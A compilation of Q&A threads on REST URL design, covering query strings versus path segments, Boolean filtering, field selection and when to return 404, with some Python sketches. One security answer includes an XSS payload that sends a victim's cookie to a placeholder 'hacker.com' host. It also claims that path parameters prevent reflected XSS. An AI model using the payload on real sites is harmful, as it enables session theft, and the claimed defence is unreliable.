RESTful URL design: full text search on any specified field

My API should support text search on specified fields, so I am wondering which URL style handles this best.
The pattern below, using "q", is mentioned in many blogs and documents for full text search, but I also need to specify field names:
GET /groups?q=bank+org
So I am thinking to use wildcards like below:
GET /groups?name=*bank*&owner=*org*
I am just wondering if this is aligned with the best practices in the market?
Thanks

Soheil, you are thinking right. "Search" is a "filter parameter", which always goes in the query string.

When sending parameters that will be used to query a collection of resources you should use... Guess what! Query parameters!
As far as I know, there's no official documentation that states that. It's a common approach and it's widely adopted. The only official documentation about the query string that I'm aware of is RFC 3986. Quoting:
3.4. Query
The query component contains non-hierarchical data that, along with
data in the path component, serves to identify a
resource within the scope of the URI's scheme and naming authority
(if any). The query component is indicated by the first question
mark ("?") character and terminated by a number sign ("#") character
or by the end of the URI. [...]
For a full text search, you can choose the parameter you find most convenient. Do you think q is a good one? Go for it! But document it well.
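To make the two URL styles from the question concrete, here is a minimal sketch of a server-side filter that accepts both a free-text q parameter and per-field wildcard patterns such as name=*bank*. The sample data, the SEARCHABLE_FIELDS whitelist and the search_groups function are assumptions made up for illustration; a real API would translate the patterns into a database query instead of scanning a list.

```python
from fnmatch import fnmatchcase
from urllib.parse import parse_qs

# Hypothetical sample data; a real API would query a database instead.
GROUPS = [
    {"name": "Central Bank Staff", "owner": "Finance Org"},
    {"name": "Chess Club", "owner": "Student Org"},
    {"name": "River Bank Cleanup", "owner": "City Council"},
]

SEARCHABLE_FIELDS = {"name", "owner"}  # assumed whitelist of filterable fields


def search_groups(query_string, groups=GROUPS):
    """Return groups matching every field pattern and every word in q."""
    params = parse_qs(query_string)
    words = " ".join(params.get("q", [])).lower().split()
    results = []
    for group in groups:
        # Field-specific wildcard filters, e.g. name=*bank*
        field_ok = all(
            fnmatchcase(group[field].lower(), pattern.lower())
            for field, patterns in params.items()
            if field in SEARCHABLE_FIELDS
            for pattern in patterns
        )
        # Free-text search across all searchable fields, e.g. q=bank+org
        haystack = " ".join(group[f] for f in SEARCHABLE_FIELDS).lower()
        text_ok = all(word in haystack for word in words)
        if field_ok and text_ok:
            results.append(group)
    return results
```

Calling search_groups("name=*bank*&owner=*org*") filters on both fields, while search_groups("q=bank+org") searches every whitelisted field at once. Parameters outside the whitelist are simply ignored in this sketch.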

Related

REST Protocol for searching and filtering

The standard REST verb for returning a value, GET, can take different parameters to select what to "get". Often there is one that takes an id to get a single value, and often some sort of search criteria to get a list.
Is there a standard way to specify the filtering and sorting of the data that is being searched for? For example, if I have an invoice record I'd like to write a GET query that says "give me all invoices for customer 123, with total > $345 and return in descending order of date".
If I were writing this myself I'd have something like:
GET http://example.com/mydata?query="customer=123&&total>345.00"&order="date"
(Note I didn't urlencode the url for clarity, though obviously that is required in practice, but I hope you get what I mean.)
I can certainly write something for this, but I am wondering if there is a standardized way to do this?
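For reference, the URL encoding that the note above says is required in practice can be sketched with Python's standard urllib.parse. The parameter names query and order come from the example URL; dropping the literal double quotes around the values is an assumption made here for simplicity.

```python
from urllib.parse import parse_qs, urlencode

# Parameter names taken from the example URL; the quotes around the
# values are dropped here (an assumption, they are not needed once encoded).
params = {"query": "customer=123&&total>345.00", "order": "date"}

encoded = urlencode(params)
url = "http://example.com/mydata?" + encoded

# The server side can recover the original values unchanged.
decoded = parse_qs(encoded)
```

Here encoded is query=customer%3D123%26%26total%3E345.00&order=date, so the inner "=", "&" and ">" no longer collide with the query string's own separators.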

Is there a standard way to specify the filtering and sorting of the data that is being searched for?
Not that I'm aware of.
Note that HTTP doesn't really have queries (yet); HTTP has resource identifiers.
We've got a standard for resource identifiers (RFC 3986) and a standard for URI templates (RFC 6570) that describes how to produce a range of identifiers via variable expansion.
But as far as I can tell there is no published "standard" that automatically transforms a URI into a SQL query.
It's possible that one of the "convention over configuration" frameworks (ex: Rails) might have something useful here, but I haven't found it.
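To illustrate what the URI template standard mentioned above does cover, here is a hand-rolled sketch of one small piece of RFC 6570: form-style query expansion of simple string values, as in the template /mydata{?customer,order}. The function name expand_query is hypothetical, and list and associative-array values, prefixes and the other operators are deliberately not handled.

```python
from urllib.parse import quote


def expand_query(names, values):
    """Expand a {?a,b,c} style template expression for simple string values.

    Undefined (missing or None) variables are skipped; if none are defined
    the expansion is the empty string.
    """
    pairs = [
        f"{name}={quote(str(values[name]), safe='')}"
        for name in names
        if values.get(name) is not None
    ]
    return "?" + "&".join(pairs) if pairs else ""


# Template: /mydata{?customer,order}
uri = "/mydata" + expand_query(["customer", "order"], {"customer": 123, "order": "date"})
```

This only produces identifiers from variables. It says nothing about what "customer" or "order" mean to the server, which is the part that has no published standard.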

RESTful query API design

I want to ask what the most RESTful way to express queries is. I have this existing API:
/entities/users?skip=0&limit=100&queries={"$find":{"$minus":{"$find":{"username":"markzu"}}}}
The first parts of the query, skip and limit, are easily identifiable; however, I find the "queries" part quite confusing for others. What the query means is:
Find every User minus Find User entities with username 'markzu'
The reason it is defined this way is due to the internal database query behavior.
In the NoSQL database we use, the resource runs two transactional queries: the first finds everything in the User table, minus a find for the User with the specified username (similar to SQL boolean operations). In other words, the query means "fetch every User except username 'markzu'".
What is the proper way to define this in a RESTful way, based on standards?

What is the proper way to define this in a RESTful way, based on standards?
REST doesn't care what spelling you use for resource identifiers, so long as your choice is consistent with the production rules defined in RFC 3986.
However, we do have a standard for URI Templates (RFC 6570):
A URI Template is a compact sequence of characters for describing a range of Uniform Resource Identifiers through variable expansion.
You are already aware of the most familiar form of URI template -- key-value pairs encoded in the query string.
?skip=0&limit=100&username=markzu
That's often a convenient choice, because HTML understands how to process forms into url encoded queries.
It doesn't look like you need any other parameters; you just need to be able to distinguish this query from others. So a perfectly reasonable choice might be
/every-user-except?skip=0&limit=100&username=markzu
It may help to think "prepared statement", rather than "query".
The underlying details of the implementation really shouldn't enter into the calculation at all. Your REST API is a facade that makes your app look like an HTTP aware key value store.
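The "prepared statement" idea can be sketched as follows: the URI names a fixed query and carries only its parameters, while the find/minus logic stays hidden behind the facade. Everything here (the USERS list, the ROUTES table, the handle function) is a hypothetical stand-in for real routing and database code.

```python
from urllib.parse import parse_qs, urlsplit

USERS = ["alice", "markzu", "bob", "carol"]  # hypothetical data store


def every_user_except(username, skip=0, limit=100):
    """The 'prepared statement': how it is computed is an internal detail."""
    remaining = [user for user in USERS if user != username]
    return remaining[skip:skip + limit]


# Assumed routing table: one path per named query.
ROUTES = {"/every-user-except": every_user_except}


def handle(uri):
    """Dispatch a URI to its named query and bind the query parameters."""
    parts = urlsplit(uri)
    params = {key: vals[0] for key, vals in parse_qs(parts.query).items()}
    handler = ROUTES[parts.path]
    return handler(
        username=params["username"],
        skip=int(params.get("skip", 0)),
        limit=int(params.get("limit", 100)),
    )
```

With this shape, handle("/every-user-except?skip=0&limit=100&username=markzu") returns every user but markzu, and the client never sees the database's query syntax.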

Boolean logic in RESTful filtering and queries

This is sort of a follow-up to someone else's question about filtering/querying a list of cars. There the recommendation for a RESTful filtering request was to put filter expressions in the query of the URI, like this:
/cars?color=blue&type=sedan&doors=4
That's fine. But what if my filtering query becomes more complicated and I need to use Boolean operators, such as:
((color=blue OR type=sedan) AND doors=4) OR color=red
That is, I want to find a four-door blue car or a four-door sedan, but if the car is red I'll take it without caring about any of the other properties.
Is there any sort of convention for providing Boolean expressions in a RESTful URI's query parameters? I suppose I could create some new querying expression language and put it in a POST, but that seems like a heavy and proprietary approach. How are others solving this?

It is perfectly okay to use
/cars/color:blue/type:sedan/doors:4
instead of
/cars?color=blue&type=sedan&doors=4
The URL standard says only that the path should contain the hierarchical part, and the query should contain the non-hierarchical. Since this is a map-reduce, using / is perfectly valid.
In your case you need a query language to describe your filters. If I were you I would copy an already existing solution, for example the query language of a noSQL database which has a REST API.
I think Resource Query Language (RQL) is what you need. I think you could use it like this:
/sthg?q="(foo=3|foo=bar)&price=lt=10"
or forget the default query string parser and use it like this:
/sthg?(foo=3|foo=bar)&price=lt=10
I suggest you read the manual for further details.
Since I found no other URL compatible query language (yet), I think the only other option is to serialize another query language and send it in a parameter, as MarkLogic 7 does with SPARQL:
http://localhost:8003/v1/graphs/sparql?query=your-urlencoded-query
Hydra defines a freeTextQuery in its vocab, so they follow the same approach. But I'll ask Markus about this. It's a complicated topic, since according to the self-descriptive messages constraint you should describe somewhere what type of query language you use in the URL. I am not sure about this. :S
Conclusion:
In order to support ad-hoc search queries we need a standard way to describe them in the link metadata. Currently there are only a few standards for this. The most widely used is URI templates, which as far as I know does not support nested statements, operators, etc. There is a draft called link descriptions which tries to fill the gap, but it is incomplete.
One possible workaround is to define a URI template with a single q parameter which has an rdf:type of x:SearchQuery and an rdfs:range of xsd:string, and to create another vocab describing such an x:SearchQuery. After that, the description could be used to build search forms and validate queries sent to the server. Already existing query languages could be supported with this approach too, so we don't need a new one.
So this problem can be solved with vocabs or new URI template standards.
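As an illustration of serializing a query language into a single parameter, here is a sketch that encodes the Boolean expression from the question as a small JSON tree and evaluates it on the server. The JSON shape ("and", "or", "field", "eq") is invented for this example; it is not RQL, SPARQL or any standard, and a real API would have to document it.

```python
import json
from urllib.parse import quote, unquote

# ((color=blue OR type=sedan) AND doors=4) OR color=red, as a hypothetical tree
FILTER = {
    "or": [
        {"and": [
            {"or": [{"field": "color", "eq": "blue"},
                    {"field": "type", "eq": "sedan"}]},
            {"field": "doors", "eq": 4},
        ]},
        {"field": "color", "eq": "red"},
    ]
}


def to_query_param(expr):
    """Serialize the expression tree so it is safe inside a query string."""
    return quote(json.dumps(expr, separators=(",", ":")), safe="")


def from_query_param(raw):
    """Inverse of to_query_param, for the server side."""
    return json.loads(unquote(raw))


def matches(expr, car):
    """Recursively evaluate an expression tree against one car record."""
    if "and" in expr:
        return all(matches(sub, car) for sub in expr["and"])
    if "or" in expr:
        return any(matches(sub, car) for sub in expr["or"])
    return car.get(expr["field"]) == expr["eq"]


url = "/cars?q=" + to_query_param(FILTER)
```

The same tree could just as well be sent in a POST body; the trade-off is between a bookmarkable, cacheable GET and a URL that grows with the complexity of the expression.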

I have seen many use a query string as you have provided - much like a SQL query string.
Here are just two examples:
Socrata (Open Data Portal company)'s SoQL (SQL variant): http://dev.socrata.com/consumers/cookbooks/querying-block-ranges.html
openFDA (API from fda.gov for open data) uses a similar string-based query parameter which maps to ElasticSearch queries, I believe: https://open.fda.gov/api/reference/#query-syntax

Try using 1 for true, 0 for false.
/_api/web/lists/getbytitle('XYZ')/items?$filter=Active eq 1

REST Field filter use

I'm designing a RESTful API and I have a question about the filter field.
On my GET queries I want the user to be able to select the fields they want in the response. I was pretty sure that it would be the field filter's job to give me the requested fields but, after some research, I found that most of the time it's used to add criteria on the fields, like an IF. Is it up to the user to show or hide the fields, with the API returning the full resource every time?
I have another question, which is about the URI representation of such a filter. Should it be something like /foo?fields=[bar1,bar2] ?
Thanks

It's not common to have a resource where you can specify which fields you want returned; by default all fields get returned. If your resource has a lot of fields or some fields have really big values, it can be a good idea to have a way to specify which fields you want returned.
In REST there are no strict rules about how you should design your URLs for filters. It is indeed common to use GET parameters because they can be optional and don't have to be in any specific order. Your proposal of /foo?fields=[bar1,bar2] seems fine; however, I would personally leave off the brackets.
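A minimal sketch of the bracket-free variant, /foo?fields=bar1,bar2, could look like this. The function name select_fields and the choice to silently ignore unknown field names are assumptions; an API could equally reject unknown names with a 400.

```python
from urllib.parse import parse_qs


def select_fields(resource, query_string):
    """Return only the requested fields, or the full resource by default."""
    requested = parse_qs(query_string).get("fields")
    if not requested:
        return dict(resource)  # no fields parameter: return everything
    # Accept both fields=a,b and repeated fields=a&fields=b
    names = [n.strip() for n in ",".join(requested).split(",") if n.strip()]
    return {name: resource[name] for name in names if name in resource}


foo = {"bar1": 1, "bar2": 2, "bar3": 3}
partial = select_fields(foo, "fields=bar1,bar2")
```

Here partial contains only bar1 and bar2, while a request without the fields parameter still gets the whole resource.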

Google Compute Engine API uses the 'fields' request parameter (see the documentation). The syntax is flexible enough to let user select/restrict even the nested elements. You may find it useful.

Yoga is a framework that allows you to deploy your own REST APIs with selectable fields. This can reduce roundtrips to the server, and improve performance.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.

There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.

In typical REST APIs, example #1 is more correct. Resources are represented as URIs, and #1 does that better. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive, like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".

There are two use cases for GET:
1. Get a uniquely identified resource
2. Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at, say, the Google Maps API, we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
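The two use cases can be sketched as two handlers that differ only in how they treat "nothing found". The PRODUCTS data and the function names are hypothetical; each handler returns a (status code, body) pair rather than using a real web framework.

```python
# Hypothetical in-memory catalogue keyed by product code.
PRODUCTS = {
    "4xxheua": {"code": "4xxheua", "size": "large", "color": "red"},
    "9zzkqpb": {"code": "9zzkqpb", "size": "small", "color": "red"},
}


def get_product(code):
    """Use case 1: GET /products/{code}; a missing resource is a 404."""
    product = PRODUCTS.get(code)
    if product is None:
        return 404, {"error": "product not found"}
    return 200, product


def search_products(**criteria):
    """Use case 2: GET /products?size=...&color=...; no matches is still 200."""
    found = [
        product
        for product in PRODUCTS.values()
        if all(product.get(key) == value for key, value in criteria.items())
    ]
    return 200, found
```

So get_product("unknown") answers 404, while search_products(color="blue") answers 200 with an empty list, because the search result itself exists even when it has no entries.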

IMO the path component should always state what you want to retrieve. A URL like http://localhost/findbyproductcode only says "I want to retrieve something by product code", but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)

The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. A big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend); this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example, watches are accessories that themselves have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.

The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.

This question is dedicated to which approach is cleaner, but I want to focus on a different aspect: security. When I started working intensively on application security, I found that a reflected XSS attack can be prevented by using PathParams (approach 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back to the client within the HTML source. Unfortunately some applications do that, and this is why PathParams may prevent XSS attacks.)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
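Whichever style carries the value, it seems safer not to rely on the URL shape alone: the slash in a payload can be percent-encoded as %2F, and whether that is decoded inside a path segment depends on the server and its configuration (an assumption about the deployment, not something stated in this thread). A minimal sketch of escaping the reflected value with Python's standard html.escape; render_not_found is a hypothetical helper, not part of any framework.

```python
from html import escape
from urllib.parse import quote, unquote

PAYLOAD = "<script>alert(1)</script>"  # harmless stand-in for the payload above


def render_not_found(product_code):
    """Build an error fragment that reflects the product code safely."""
    return "<p>No product with code " + escape(product_code) + "</p>"


# Once encoded, the payload fits in a single path segment: no literal slash.
encoded_segment = quote(PAYLOAD, safe="")

# If the server decodes the segment, the handler sees the full payload again,
# so the output still has to be escaped.
page = render_not_found(unquote(encoded_segment))
```

Here page contains &lt;script&gt; instead of a live script tag, regardless of whether the code arrived as a path segment or as a query parameter.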

The query string is unavoidable in many practical senses. Consider what would happen if the search allowed multiple (optional) fields to all be specified. In the first form, their positions in the hierarchy would have to be fixed and padded.
Imagine coding a general SQL "where clause" in that format. As a query string, however, it is quite simple.
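To show how simple the query string version can be, here is a sketch that turns optional parameters into a parameterized WHERE clause using Python's standard sqlite3 module. The cars table, its columns and the ALLOWED_COLUMNS whitelist are assumptions for illustration; column names come only from the whitelist and values are always bound, never concatenated.

```python
import sqlite3
from urllib.parse import parse_qs

# Assumed whitelist: only these query parameters may become SQL columns.
ALLOWED_COLUMNS = ("color", "type", "doors")


def build_query(query_string):
    """Translate optional query parameters into SQL plus bound values."""
    params = parse_qs(query_string)
    clauses, values = [], []
    for column in ALLOWED_COLUMNS:
        if column in params:
            clauses.append(f"{column} = ?")
            values.append(params[column][0])
    sql = "SELECT color, type, doors FROM cars"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return sql, values


def find_cars(connection, query_string):
    """Run the generated query on an open sqlite3 connection."""
    sql, values = build_query(query_string)
    return connection.execute(sql, values).fetchall()
```

Any subset of the fields can be supplied in any order, and parameters that are not whitelisted are ignored, which is exactly what a fixed path hierarchy makes awkward.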

For the REST client, the URI structure does not matter, because it follows links annotated with semantics and never parses the URI.
For the developer who writes the routing and link generation logic, and who probably wants to understand logs by checking the URLs, the URI structure does matter. With REST we map URIs to resources, not to operations (see Fielding's dissertation: uniform interface, identification of resources).
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "when reducing the collection to a single resource using a unique identifier, the unique identifier must always be part of the path and not the query". This is in line with what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.

Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line Python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote McDonald's server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.
